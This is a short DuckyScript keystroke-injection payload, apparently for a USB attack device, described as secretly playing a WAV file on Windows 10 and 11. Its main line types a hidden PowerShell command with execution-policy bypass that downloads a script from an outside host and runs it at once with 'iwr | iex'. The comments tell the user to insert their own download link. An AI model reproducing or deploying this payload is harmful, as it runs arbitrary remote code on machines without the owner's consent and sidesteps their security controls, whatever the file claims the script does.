REM     Title: Play-WAV
REM
REM     Author: I am Jakoby
REM
REM     Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM
REM     Target: Windows 10, 11
REM
REM     Remeber to replace the link with your link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
DELAY 500
ENTER
